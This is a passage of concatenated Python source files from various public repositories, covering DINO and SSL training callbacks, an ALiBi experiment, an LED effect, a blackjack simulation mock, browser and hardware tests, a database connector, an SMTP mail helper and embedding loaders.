layers.append(nn.BatchNorm1d(hidden_dim))
layers.append(nn.GELU())
layers.append(nn.Linear(hidden_dim, bottleneck_dim))
self.mlp = nn.Sequential(*layers)
self.apply(self._init_weights)
self.last_layer = nn.utils.weight_norm(nn.Linear(bottleneck_dim, out_dim, bias=False))
self.last_layer.weight_g.data.fill_(1)
if norm_last_layer:
self.last_layer.weight_g.requires_grad = False
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
def forward(self, x):
x = self.mlp(x)
x = nn.functional.normalize(x, dim=-1, p=2)
x = self.last_layer(x)
return x
# Cell
@delegates(get_multi_aug_pipelines, but=['n', 'size', 'resize_scale'])
def get_dino_aug_pipelines(num_crops=(2,4), crop_sizes=(224,96), min_scales=(0.4,0.05), max_scales=(1.,0.4), **kwargs):
aug_pipelines = []
for nc, size, mins, maxs in zip(num_crops, crop_sizes, min_scales, max_scales):
aug_pipelines += get_multi_aug_pipelines(n=nc, size=size, resize_scale=(mins,maxs), **kwargs)
return aug_pipelines
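# Editorial sketch (not an exported cell): build the standard DINO multi-crop
# augmentation pipelines, two global 224px crops followed by four local 96px
# crops, by passing the defaults explicitly.
def _example_dino_aug_pipelines():
    return get_dino_aug_pipelines(num_crops=(2, 4),
                                  crop_sizes=(224, 96),
                                  min_scales=(0.4, 0.05),
                                  max_scales=(1., 0.4))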
# Cell
class DINOModel(Module):
def __init__(self, student, teacher):
"A module for loading and saving all training params together"
self.student,self.teacher = student,teacher
self.teacher.load_state_dict(student.state_dict())
for p in self.teacher.parameters(): p.requires_grad = False
self.register_buffer('C', torch.zeros(1,num_features_model(teacher)))
def forward(self,x): return self.student(x)
# Cell
class DINO(Callback):
order,run_valid = 9,True
def __init__(self, aug_pipelines, large_crop_ids=[0,1],
cmom=0.9,
tmom_start=0.996, tmom_end=1., tmom_sched=SchedCos,
tpt_start=0.04, tpt_end=0.04, tpt_warmup_pct=0., tpt_sched=SchedLin,
tps=0.1,
freeze_last_layer=1,
print_augs=False):
"""
DINO teacher student training with distillation.
Refer to original repo:
https://github.com/facebookresearch/dino/blob/0be6e112dd579203caaa1d0f066e29ca536f76dd/main_dino.py#L41
        cmom: Center update momentum.
        tmom_start, tmom_end: Teacher update momentum schedule. Use a larger value, e.g. 0.9995, for small batches or 0.996 for large batches (256+).
        tpt_start: Teacher temperature at the start of the warm-up
        tpt_warmup_pct: Percentage of training used for the temperature warm-up
        tpt_sched: Warm-up scheduler, e.g. SchedLin, SchedCos, SchedExp
        tpt_end: Teacher temperature after warm-up. Decrease if the training loss does not decrease.
        Smaller temperature means more sharpening.
        tps: Student temperature.
        freeze_last_layer: How many epochs to freeze the last layer
"""
store_attr('large_crop_ids,cmom,freeze_last_layer,tps')
self.augs = aug_pipelines
self.tpt_scheduler = combine_scheds([tpt_warmup_pct,1-tpt_warmup_pct],
[tpt_sched(tpt_start,tpt_end),SchedNo(tpt_end,tpt_end)])
self.tmom_scheduler = tmom_sched(tmom_start, tmom_end)
if print_augs:
for aug in self.augs: print(aug)
def before_fit(self):
"Create teacher model as a copy of student"
self.learn.loss_func = self.lf
self.tpt = self.tpt_scheduler(0.)
self.tmom = self.tmom_scheduler(0.)
self.model.teacher.eval()
for n,p in self.learn.model.student[1].last_layer.named_parameters():
if n == 'weight_v' : p.requires_grad = False
def before_batch(self):
"Augment multi crop views"
self.bs = self.x.size(0)
self.learn.xb = ([aug(self.x) for aug in self.augs],)
x_large = [self.learn.xb[0][i] for i in self.large_crop_ids]
        # TODO: do we need to put the teacher in eval()? It is not done in the original repo.
with torch.no_grad():
targs = self.model.teacher(x_large)
self.learn.yb = (targs,)
self.cb = targs.mean(0, keepdim=True)
def _momentum_update_teacher(self):
for param_s, param_t in zip(self.learn.model.student.parameters(), self.model.teacher.parameters()):
param_t.data = param_t.data * self.tmom + param_s.data * (1. - self.tmom)
def _momentum_update_center(self):
self.model.C = self.model.C*self.cmom + self.cb*(1-self.cmom)
def after_step(self):
"Center and teacher updates"
self._momentum_update_teacher(); self._momentum_update_center()
def after_epoch(self):
"Update tpt at the end of each epoch"
self.tpt = self.tpt_scheduler(self.pct_train)
self.tmom = self.tmom_scheduler(self.pct_train)
if self.epoch == self.freeze_last_layer:
print("Setting last layer to trainable")
for n,p in self.learn.model.student[1].last_layer.named_parameters():
if n == 'weight_v' : p.requires_grad = True
def lf(self, pred, *yb):
"Multi crop cross entropy loss: -qlog(p)"
yb = yb[0]
pred = F.log_softmax(pred / self.tps, dim=-1)
yb = F.softmax((yb - self.model.C) / self.tpt, dim=-1)
n_targs, n_preds = yb.size(0)//self.bs, pred.size(0)//self.bs
yb, pred = yb.chunk(n_targs), pred.chunk(n_preds)
loss, npairs = 0, n_targs*(n_preds-1)
for ti in range(n_targs):
for pi in range(n_preds):
if ti != pi:
loss += (-yb[ti]*pred[pi]).sum(-1).mean() / npairs
return loss
@torch.no_grad()
def show(self, n=1):
xbs = self.learn.xb[0]
idxs = np.random.choice(range(self.bs), n, False)
images = [aug.decode(xb.to('cpu').clone()).clamp(0, 1)[i]
for i in idxs
for xb, aug in zip(xbs, self.augs)]
return show_batch(images[0], None, images, max_n=len(images), nrows=n) |
effects/police.py | vexofp/hyperion | 725 | 12795954 | import hyperion
import time
import colorsys
# Get the parameters
rotationTime = float(hyperion.args.get('rotation-time', 2.0))
colorOne = hyperion.args.get('color_one', (255,0,0))
colorTwo = hyperion.args.get('color_two', (0,0,255))
colorsCount = hyperion.args.get('colors_count', hyperion.ledCount/2)
reverse = bool(hyperion.args.get('reverse', False))
# Check parameters
rotationTime = max(0.1, rotationTime)
colorsCount = min(hyperion.ledCount/2, colorsCount)
# Initialize the led data
hsv1 = colorsys.rgb_to_hsv(colorOne[0]/255.0, colorOne[1]/255.0, colorOne[2]/255.0)
hsv2 = colorsys.rgb_to_hsv(colorTwo[0]/255.0, colorTwo[1]/255.0, colorTwo[2]/255.0)
colorBlack = (0,0,0)
ledData = bytearray()
for i in range(hyperion.ledCount):
if i <= colorsCount:
rgb = colorsys.hsv_to_rgb(hsv1[0], hsv1[1], hsv1[2])
elif (i >= hyperion.ledCount/2-1) & (i < (hyperion.ledCount/2) + colorsCount):
rgb = colorsys.hsv_to_rgb(hsv2[0], hsv2[1], hsv2[2])
else:
rgb = colorBlack
ledData += bytearray((int(255*rgb[0]), int(255*rgb[1]), int(255*rgb[2])))
# Calculate the sleep time and rotation increment
increment = 3
sleepTime = rotationTime / hyperion.ledCount
while sleepTime < 0.05:
increment *= 2
sleepTime *= 2
increment %= hyperion.ledCount
# Switch direction if needed
if reverse:
increment = -increment
# Start the write data loop
while not hyperion.abort():
hyperion.setColor(ledData)
ledData = ledData[-increment:] + ledData[:-increment]
time.sleep(sleepTime)
|
labml_nn/transformers/alibi/experiment.py | BioGeek/annotated_deep_learning_paper_implementations | 3,714 | 12795955 | """
---
title: Attention with Linear Biases (ALiBi) Experiment
summary: This experiment trains an Attention with Linear Biases (ALiBi) based model on Tiny Shakespeare dataset.
---
# [Attention with Linear Biases (ALiBi)](index.html) Experiment
This is an annotated PyTorch experiment to train a [ALiBi model](index.html).
This is based on
[our GPT model](../gpt/index.html).
[](https://app.labml.ai/run/e87bec2a074911ec82cdd1759f10c925)
"""
import torch
from torch.utils.data import DataLoader
from labml import experiment, tracker
from labml.configs import option, calculate
from labml_helpers.datasets.text import SequentialUnBatchedDataset
from labml_nn.transformers.alibi import AlibiMultiHeadAttention
from labml_nn.experiments.nlp_autoregression import transpose_batch
from labml_nn.transformers import TransformerConfigs
from labml_nn.transformers.gpt import Configs as GPTConfigs
class Configs(GPTConfigs):
"""
## Configurations
We extend [GPT configurations](../gpt/index.html) and change the attention mechanism.
"""
# ALiBi based transformer (defined below)
transformer: TransformerConfigs = 'GPT_ALiBi'
# Longer validation set
valid_seq_len: int = 128
valid_loader = 'shuffled_longer_valid_loader'
def other_metrics(self, output: torch.Tensor, target: torch.Tensor):
"""
Log losses at the initial and final tokens
"""
# If there are more tokens that the training sequence length (during validation),
if self.seq_len < output.shape[0]:
# Log the loss at training sequence length
tracker.add(f'loss.{self.seq_len - 1}.', self.loss_func(output[self.seq_len - 1], target[self.seq_len - 1]))
# Log the loss at the first token
tracker.add(f'loss.0.', self.loss_func(output[0], target[0]))
# Log the loss at the final token
tracker.add(f'loss.{int(output.shape[0]) - 1}.', self.loss_func(output[-1], target[-1]))
def _alibi_mha(c: TransformerConfigs):
"""
Create an ALiBi attention module
"""
return AlibiMultiHeadAttention(c.n_heads, c.d_model, dropout_prob=c.dropout)
# Set all attention mechanisms to ALiBi
calculate(TransformerConfigs.encoder_attn, 'alibi_mha', _alibi_mha)
calculate(TransformerConfigs.decoder_attn, 'alibi_mha', _alibi_mha)
calculate(TransformerConfigs.decoder_mem_attn, 'alibi_mha', _alibi_mha)
@option(Configs.valid_loader)
def shuffled_longer_valid_loader(c: Configs):
"""
Shuffled validation data loader with `valid_seq_len` sequence length
"""
return DataLoader(SequentialUnBatchedDataset(text=c.text.valid,
dataset=c.text,
seq_len=c.valid_seq_len),
batch_size=c.batch_size,
collate_fn=transpose_batch,
shuffle=True)
@option(Configs.transformer, 'GPT_ALiBi')
def _transformer_configs(c: Configs):
"""
### ALiBi based Transformer configurations
"""
# We use our
# [configurable transformer implementation](../configs.html#TransformerConfigs)
conf = TransformerConfigs()
# Set the vocabulary sizes for embeddings and generating logits
conf.n_src_vocab = c.n_tokens
conf.n_tgt_vocab = c.n_tokens
# GPT uses GELU activation for position wise feedforward
conf.ffn.activation = 'GELU'
# ALiBi doesn't use positional embeddings
conf.src_embed = 'no_pos'
conf.tgt_embed = 'no_pos'
# Set all attention mechanisms to ALiBi
conf.encoder_attn = 'alibi_mha'
conf.decoder_attn = 'alibi_mha'
conf.decoder_mem_attn = 'alibi_mha'
#
return conf
def main():
# Create experiment
experiment.create(name="gpt_alibi")
# Create configs
conf = Configs()
# Override configurations
experiment.configs(conf, {
# Use character level tokenizer
'tokenizer': 'character',
# Prompt separator is blank
'prompt_separator': '',
# Starting prompt for sampling
'prompt': 'It is ',
# Use Tiny Shakespeare dataset
'text': 'tiny_shakespeare',
# 'text': 'tiny_shakespeare_no_split',
        # Use a training context size of $64$
        'seq_len': 64,
        # Use a validation context size of $80$
        'valid_seq_len': 80,
        # Train for $128$ epochs
'epochs': 128,
# Batch size $128$
'batch_size': 128,
# Switch between training and validation for $10$ times
# per epoch
'inner_iterations': 10,
# Transformer configurations
'transformer.d_model': 128,
'transformer.ffn.d_ff': 512,
'transformer.n_heads': 8,
'transformer.n_layers': 4,
'transformer.dropout': 0.1,
})
# Set models for saving and loading
experiment.add_pytorch_models({'model': conf.model})
# Start the experiment
with experiment.start():
# Run training
conf.run()
#
if __name__ == '__main__':
main()
|
Chapter_14/simulation_model.py | pauldevos/Mastering-Object-Oriented-Python-Second-Edition | 108 | 12795972 | <reponame>pauldevos/Mastering-Object-Oriented-Python-Second-Edition
#!/usr/bin/env python3.7
"""
Mastering Object-Oriented Python 2e
Code Examples for Mastering Object-Oriented Python 2nd Edition
Chapter 14. Example 1 -- simulation model.
"""
from dataclasses import dataclass, astuple, asdict, field
from typing import Tuple, Iterator
from pathlib import Path
import csv
# Mock Object Model
# =====================
# A set of class hierarchies that we'll use for several examples.
# The content is mostly mocks.
class DealerRule:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
class Hit17(DealerRule):
"""Hits soft 17"""
pass
class Stand17(DealerRule):
"""Stands on soft 17"""
pass
class SplitRule:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
class ReSplit(SplitRule):
"""Simplistic resplit anything."""
pass
class NoReSplit(SplitRule):
"""Simplistic no resplit."""
pass
class NoReSplitAces(SplitRule):
"""One card only to aces; no resplit."""
pass
@dataclass
class Table:
decks: int
limit: int
dealer: DealerRule
split: SplitRule
payout: Tuple[int, int]
class PlayerStrategy:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
class SomeStrategy(PlayerStrategy):
pass
class AnotherStrategy(PlayerStrategy):
pass
class BettingStrategy:
def __repr__(self) -> str:
return f"{self.__class__.__name__}()"
def bet(self) -> int:
raise NotImplementedError("No bet method")
def record_win(self) -> None:
pass
def record_loss(self) -> None:
pass
class Flat(BettingStrategy):
pass
class Martingale(BettingStrategy):
pass
class OneThreeTwoSix(BettingStrategy):
pass
@dataclass
class Player:
play: PlayerStrategy
betting: BettingStrategy
max_rounds: int
init_stake: int
rounds: int = field(init=False)
stake: float = field(init=False)
def __post_init__(self):
self.reset()
def reset(self) -> None:
self.rounds = self.max_rounds
self.stake = self.init_stake
# A mock simulation which is built from the above mock objects.
import random
@dataclass
class Simulate:
"""Mock simulation."""
table: Table
player: Player
samples: int
def __iter__(self) -> Iterator[Tuple]:
"""Yield statistical samples."""
x, y = self.table.payout
blackjack_payout = x / y
for count in range(self.samples):
self.player.reset()
while self.player.stake > 0 and self.player.rounds > 0:
self.player.rounds -= 1
outcome = random.random()
if outcome < 0.579:
self.player.stake -= 1
elif 0.579 <= outcome < 0.883:
self.player.stake += 1
elif 0.883 <= outcome < 0.943:
# a "push"
pass
else:
# 0.943 <= outcome
self.player.stake += blackjack_payout
yield astuple(self.table) + astuple(self.player)
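# Editorial sketch: run a short mock simulation with arbitrary example rules and
# strategies and collect the sample rows.
def demo_simulation(samples: int = 10) -> list:
    table = Table(decks=6, limit=50, dealer=Hit17(), split=NoReSplit(), payout=(3, 2))
    player = Player(play=SomeStrategy(), betting=Flat(), max_rounds=100, init_stake=50)
    return list(Simulate(table=table, player=player, samples=samples))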
def check(path: Path) -> None:
"""
Validate unit test result file can be read.
:param path: Path to the example output
"""
with path.open("r") as results:
rdr = csv.reader(results)
outcomes = (float(row[10]) for row in rdr)
first = next(outcomes)
sum_0, sum_1 = 1, first
value_min = value_max = first
for value in outcomes:
sum_0 += 1 # value**0
sum_1 += value # value**1
value_min = min(value_min, value)
value_max = max(value_max, value)
mean = sum_1 / sum_0
print(
f"{path}\nMean = {mean:.1f}\n"
f"House Edge = { 1 - mean / 50:.1%}\n"
f"Range = {value_min:.1f} {value_max:.1f}"
)
|
tests/exception_test.py | gglin001/poptorch | 128 | 12795997 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import pytest
import torch
import poptorch
def harness(setting, Model, args):
opts = poptorch.Options()
if setting == "true":
opts.Precision.enableFloatingPointExceptions(True)
elif setting == "false":
opts.Precision.enableFloatingPointExceptions(False)
poptorch_model = poptorch.inferenceModel(Model(), opts)
if setting == "true":
with pytest.raises(poptorch.Error):
poptorch_model(*args)
else:
poptorch_model(*args)
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
@pytest.mark.parametrize("setting", {"default", "true", "false"})
def test_div0(setting):
class Model(torch.nn.Module):
def forward(self, x, y):
return x / y
x = torch.ones(10, 10)
y = torch.zeros(10, 10)
harness(setting, Model, [x, y])
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
@pytest.mark.parametrize("setting", {"default", "true", "false"})
def test_mul0inf(setting):
class Model(torch.nn.Module):
def forward(self, x, y):
return x * y
x = torch.zeros(10, 10)
y = torch.div(torch.ones(10, 10), torch.zeros(10, 10))
harness(setting, Model, [x, y])
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
@pytest.mark.parametrize("setting", {"default", "true", "false"})
def test_nonreal(setting):
class Model(torch.nn.Module):
def forward(self, x):
return torch.sqrt(x)
x = torch.Tensor([-1, -2])
harness(setting, Model, [x])
@pytest.mark.parametrize("setting", {"default", "true", "false"})
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
def test_nan(setting):
class Model(torch.nn.Module):
def forward(self, x, y):
return x > y
x = torch.ones(10, 10)
y = torch.div(torch.zeros(10, 10), torch.zeros(10, 10))
harness(setting, Model, [x, y])
@pytest.mark.parametrize("setting", {"default", "true", "false"})
@pytest.mark.skipif(not poptorch.ipuHardwareIsAvailable(),
reason="Floating point exception not supported on model")
def test_ovf(setting):
class Model(torch.nn.Module):
def forward(self, x):
return torch.exp(x)
x = torch.Tensor([3800, 4203])
harness(setting, Model, [x])
|
tests/acceptance/selene_page_factory_test.py | pupsikpic/selene | 572 | 12796012 | <filename>tests/acceptance/selene_page_factory_test.py
# MIT License
#
# Copyright (c) 2015-2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from selene import have
from selene.support.shared import browser
from tests.integration.helpers.givenpage import GivenPage
empty_page = 'file://{}/../resources/empty.html'.format(
os.path.abspath(os.path.dirname(__file__))
)
def setup_function():
browser.quit()
def teardown_function():
browser.config.browser_name = 'chrome'
browser.quit()
def test_can_init_default_browser_on_visit():
browser.open(empty_page)
GivenPage(browser.driver).opened_with_body(
'''
<h1 id="header">Selene</h1>'''
)
browser.element("#header").should(have.exact_text("Selene"))
assert browser.driver.name == 'chrome'
def test_can_init_custom_browser_on_visit():
browser.config.browser_name = 'firefox'
browser.open(empty_page)
GivenPage(browser.driver).opened_with_body(
'''
<a id="selene_link">Selene site</a>
'''
)
browser.element("#selene_link").should(have.exact_text("Selene site"))
assert browser.driver.name == 'firefox'
def test_can_init_default_browser_after_custom():
browser.open(empty_page)
GivenPage(browser.driver).opened_with_body(
'''
<h1 id="header">Selene</h1>
'''
)
browser.element("#header").should(have.exact_text("Selene"))
assert browser.driver.name == 'chrome'
|
contrib/python/CUBRIDdb/connections.py | eido5/cubrid | 253 | 12796064 | """
This module implements connections for CUBRIDdb. Presently there is
only one class: Connection. Others are unlikely. However, you might
want to make your own subclasses. In most cases, you will probably
override Connection.default_cursor with a non-standard Cursor class.
"""
from CUBRIDdb.cursors import *
import types, _cubrid
class Connection(object):
"""CUBRID Database Connection Object"""
def __init__(self, *args, **kwargs):
        'Create a connection to the database.'
self.charset = ''
kwargs2 = kwargs.copy()
self.charset = kwargs2.pop('charset', 'utf8')
self.connection = _cubrid.connect(*args, **kwargs2)
def __del__(self):
pass
def cursor(self, dictCursor = None):
if dictCursor:
cursorClass = DictCursor
else:
cursorClass = Cursor
return cursorClass(self)
def set_autocommit(self, value):
if not isinstance(value, bool):
raise ValueError("Parameter should be a boolean value")
if value:
switch = 'TRUE'
else:
switch = 'FALSE'
self.connection.set_autocommit(switch)
def get_autocommit(self):
if self.connection.autocommit == 'TRUE':
return True
else:
return False
autocommit = property(get_autocommit, set_autocommit, doc = "autocommit value for current Cubrid session")
def commit(self):
self.connection.commit()
def rollback(self):
self.connection.rollback()
def close(self):
self.connection.close()
def escape_string(self, buf):
return self.connection.escape_string(buf)
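# Editorial sketch: the module docstring suggests subclassing Connection to change
# the default cursor behaviour; DictConnection below is a hypothetical example and
# not part of the CUBRIDdb API.
class DictConnection(Connection):
    """Connection whose cursor() returns DictCursor objects by default."""
    def cursor(self, dictCursor=True):
        return Connection.cursor(self, dictCursor)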
|
Python/math/sum_of_digits.py | TechSpiritSS/NeoAlgo | 897 | 12796066 | # Python program to Find the Sum of Digits of a Number
def sum_of_digits(num):
# Extracting Each digits
    # and compute their sum in 's'
s = 0
while num != 0:
s = s + (num % 10)
num = num // 10
return s
if __name__ == '__main__':
# Input the number And
# Call the function
print("Enter the number: ", end="")
n = int(input())
S = sum_of_digits(abs(n))
print("The sum of digits of the given number is {}.".format(S))
'''
    Time Complexity: O(log(num)), i.e. proportional to the number of digits in the given number
Space Complexity: O(1)
SAMPLE INPUT AND OUTPUT
SAMPLE 1
Enter the number: -12
The sum of digits of the given number is 3.
SAMPLE 2
Enter the number: 43258
The sum of digits of the given number is 22.
'''
|
monitor/utils/mail.py | laozhudetui/wam | 227 | 12796105 | #!/usr/bin/env python
# coding: utf-8
# built-in modules
import smtplib
from email.mime.text import MIMEText
from monitor.utils.settings import EMAIL_SERVER
from monitor.utils.settings import EMAIL_PORT
from monitor.utils.settings import EMAIL_USER
from monitor.utils.settings import EMAIL_PASS
from monitor.utils.settings import EMAIL_FROM_ADDR
from monitor.utils.email_list import EMAIL_LIST
def _sendmail(to_list, subject, content):
"""
params:
        to_list[list]:
subject[str]:
content[str]: plain content
"""
msg = MIMEText(content, 'plain', 'utf-8')
msg['Subject'] = subject
msg['From'] = EMAIL_FROM_ADDR
msg['To'] = ', '.join(to_list)
smtp = smtplib.SMTP_SSL()
smtp.set_debuglevel(0)
smtp.connect(EMAIL_SERVER, EMAIL_PORT)
smtp.login(EMAIL_USER, EMAIL_PASS)
smtp.sendmail(EMAIL_FROM_ADDR, to_list, msg.as_string())
smtp.quit()
def sendmail(subject, content):
"""
params:
subject[str]:
content[str]: plain content
"""
if EMAIL_LIST:
_sendmail(EMAIL_LIST, subject, content)
else:
raise ValueError('email list is empty')
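if __name__ == '__main__':
    # Manual smoke test (illustrative only; requires the SMTP settings and a
    # non-empty EMAIL_LIST to be configured).
    sendmail('[wam] mail test', 'This is a test message from the monitor.')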
|
pl_bolts/callbacks/ssl_online.py | Aayush-Jain01/lightning-bolts | 504 | 12796109 | <filename>pl_bolts/callbacks/ssl_online.py
from contextlib import contextmanager
from typing import Any, Dict, Optional, Sequence, Tuple, Union
import torch
from pytorch_lightning import Callback, LightningModule, Trainer
from pytorch_lightning.utilities import rank_zero_warn
from torch import Tensor, nn
from torch.nn import functional as F
from torch.optim import Optimizer
from torchmetrics.functional import accuracy
from pl_bolts.models.self_supervised.evaluator import SSLEvaluator
class SSLOnlineEvaluator(Callback): # pragma: no cover
"""Attaches a MLP for fine-tuning using the standard self-supervised protocol.
Example::
# your datamodule must have 2 attributes
dm = DataModule()
dm.num_classes = ... # the num of classes in the datamodule
dm.name = ... # name of the datamodule (e.g. ImageNet, STL10, CIFAR10)
# your model must have 1 attribute
model = Model()
model.z_dim = ... # the representation dim
online_eval = SSLOnlineEvaluator(
z_dim=model.z_dim
)
"""
def __init__(
self,
z_dim: int,
drop_p: float = 0.2,
hidden_dim: Optional[int] = None,
num_classes: Optional[int] = None,
dataset: Optional[str] = None,
):
"""
Args:
z_dim: Representation dimension
drop_p: Dropout probability
hidden_dim: Hidden dimension for the fine-tune MLP
"""
super().__init__()
self.z_dim = z_dim
self.hidden_dim = hidden_dim
self.drop_p = drop_p
self.optimizer: Optional[Optimizer] = None
self.online_evaluator: Optional[SSLEvaluator] = None
self.num_classes: Optional[int] = None
self.dataset: Optional[str] = None
self.num_classes: Optional[int] = num_classes
self.dataset: Optional[str] = dataset
self._recovered_callback_state: Optional[Dict[str, Any]] = None
def setup(self, trainer: Trainer, pl_module: LightningModule, stage: Optional[str] = None) -> None:
if self.num_classes is None:
self.num_classes = trainer.datamodule.num_classes
if self.dataset is None:
self.dataset = trainer.datamodule.name
def on_pretrain_routine_start(self, trainer: Trainer, pl_module: LightningModule) -> None:
# must move to device after setup, as during setup, pl_module is still on cpu
self.online_evaluator = SSLEvaluator(
n_input=self.z_dim,
n_classes=self.num_classes,
p=self.drop_p,
n_hidden=self.hidden_dim,
).to(pl_module.device)
        # switch for PL compatibility reasons
accel = (
trainer.accelerator_connector
if hasattr(trainer, "accelerator_connector")
else trainer._accelerator_connector
)
if accel.is_distributed:
if accel.use_ddp:
from torch.nn.parallel import DistributedDataParallel as DDP
self.online_evaluator = DDP(self.online_evaluator, device_ids=[pl_module.device])
elif accel.use_dp:
from torch.nn.parallel import DataParallel as DP
self.online_evaluator = DP(self.online_evaluator, device_ids=[pl_module.device])
else:
rank_zero_warn(
"Does not support this type of distributed accelerator. The online evaluator will not sync."
)
self.optimizer = torch.optim.Adam(self.online_evaluator.parameters(), lr=1e-4)
if self._recovered_callback_state is not None:
self.online_evaluator.load_state_dict(self._recovered_callback_state["state_dict"])
self.optimizer.load_state_dict(self._recovered_callback_state["optimizer_state"])
def to_device(self, batch: Sequence, device: Union[str, torch.device]) -> Tuple[Tensor, Tensor]:
# get the labeled batch
if self.dataset == "stl10":
labeled_batch = batch[1]
batch = labeled_batch
inputs, y = batch
# last input is for online eval
x = inputs[-1]
x = x.to(device)
y = y.to(device)
return x, y
def shared_step(
self,
pl_module: LightningModule,
batch: Sequence,
):
with torch.no_grad():
with set_training(pl_module, False):
x, y = self.to_device(batch, pl_module.device)
representations = pl_module(x).flatten(start_dim=1)
# forward pass
mlp_logits = self.online_evaluator(representations) # type: ignore[operator]
mlp_loss = F.cross_entropy(mlp_logits, y)
acc = accuracy(mlp_logits.softmax(-1), y)
return acc, mlp_loss
def on_train_batch_end(
self,
trainer: Trainer,
pl_module: LightningModule,
outputs: Sequence,
batch: Sequence,
batch_idx: int,
dataloader_idx: int,
) -> None:
train_acc, mlp_loss = self.shared_step(pl_module, batch)
# update finetune weights
mlp_loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
pl_module.log("online_train_acc", train_acc, on_step=True, on_epoch=False)
pl_module.log("online_train_loss", mlp_loss, on_step=True, on_epoch=False)
def on_validation_batch_end(
self,
trainer: Trainer,
pl_module: LightningModule,
outputs: Sequence,
batch: Sequence,
batch_idx: int,
dataloader_idx: int,
) -> None:
val_acc, mlp_loss = self.shared_step(pl_module, batch)
pl_module.log("online_val_acc", val_acc, on_step=False, on_epoch=True, sync_dist=True)
pl_module.log("online_val_loss", mlp_loss, on_step=False, on_epoch=True, sync_dist=True)
def on_save_checkpoint(self, trainer: Trainer, pl_module: LightningModule, checkpoint: Dict[str, Any]) -> dict:
return {"state_dict": self.online_evaluator.state_dict(), "optimizer_state": self.optimizer.state_dict()}
def on_load_checkpoint(self, trainer: Trainer, pl_module: LightningModule, callback_state: Dict[str, Any]) -> None:
self._recovered_callback_state = callback_state
@contextmanager
def set_training(module: nn.Module, mode: bool):
"""Context manager to set training mode.
When exit, recover the original training mode.
Args:
module: module to set training mode
mode: whether to set training mode (True) or evaluation mode (False).
"""
original_mode = module.training
try:
module.train(mode)
yield module
finally:
module.train(original_mode)
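# Minimal usage sketch for set_training (illustrative, kept as comments; `model`
# is a hypothetical nn.Module, not part of this module):
#
#   model = nn.Linear(4, 2)
#   model.train()                     # original mode: training
#   with set_training(model, False):  # temporarily switch to eval mode
#       assert not model.training
#   assert model.training             # original mode restored on exit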
|
GCC-paddle/gcc/models/emb/from_numpy.py | S-HuaBomb/Contrib | 243 | 12796123 | <reponame>S-HuaBomb/Contrib
import random
import networkx as nx
import numpy as np
class Zero(object):
def __init__(self, hidden_size, **kwargs):
self.hidden_size = hidden_size
def train(self, G):
return np.zeros((G.number_of_nodes(), self.hidden_size))
class FromNumpy(object):
def __init__(self, hidden_size, emb_path, **kwargs):
super(FromNumpy, self).__init__()
self.hidden_size = hidden_size
self.emb = np.load(emb_path)
def train(self, G):
id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())])
embeddings = np.asarray([self.emb[id2node[i]] for i in range(len(id2node))])
assert G.number_of_nodes() == embeddings.shape[0]
return embeddings
class FromNumpyGraph(FromNumpy):
def train(self, G):
assert G is None
return self.emb
class FromNumpyAlign(object):
def __init__(self, hidden_size, emb_path_1, emb_path_2, **kwargs):
self.hidden_size = hidden_size
self.emb_1 = np.load(emb_path_1)
self.emb_2 = np.load(emb_path_2)
self.t1, self.t2 = False, False
def train(self, G):
if G.number_of_nodes() == self.emb_1.shape[0] and not self.t1:
emb = self.emb_1
self.t1 = True
elif G.number_of_nodes() == self.emb_2.shape[0] and not self.t2:
emb = self.emb_2
self.t2 = True
else:
raise NotImplementedError
id2node = dict([(vid, node) for vid, node in enumerate(G.nodes())])
embeddings = np.asarray([emb[id2node[i]] for i in range(len(id2node))])
return embeddings
|
src/yolo4/BaseModel.py | xiao9616/yolo4_tensorflow2 | 212 | 12796167 | # =============================================
# -*- coding: utf-8 -*-
# @Time : 2020/5/14 上午10:50
# @Author : xiao9616
# @Email : <EMAIL>
# @File : BaseModel.py
# @Software: PyCharm
# ============================================
import logging
import tensorflow as tf
import os
from src.yolo4.config import *
from src.yolo4.util import *
from src.yolo4.Net import YOLO4_NET
from src.yolo4.Loss import YOLO4_LOSS
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S', filename="./yolo4/logs/train.log", filemode='w+')
class BaseModel(object):
'''
    A custom base class; the methods below can be overridden in subclasses:
'''
def data_generator(self):
'''
        Returns: this method can be overridden; it should return a tf.data dataset object
'''
txt_data = tf.data.TextLineDataset(filenames=train_path)
count = 0
for _ in txt_data:
count += 1
train_data = txt_data.batch(batch_size=batch_size)
return train_data, count
def net_generator(self):
net = YOLO4_NET()
return net
def loss_generator(self):
loss = YOLO4_LOSS()
return loss
def optimizer_generator(self):
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
initial_learning_rate=0.001,
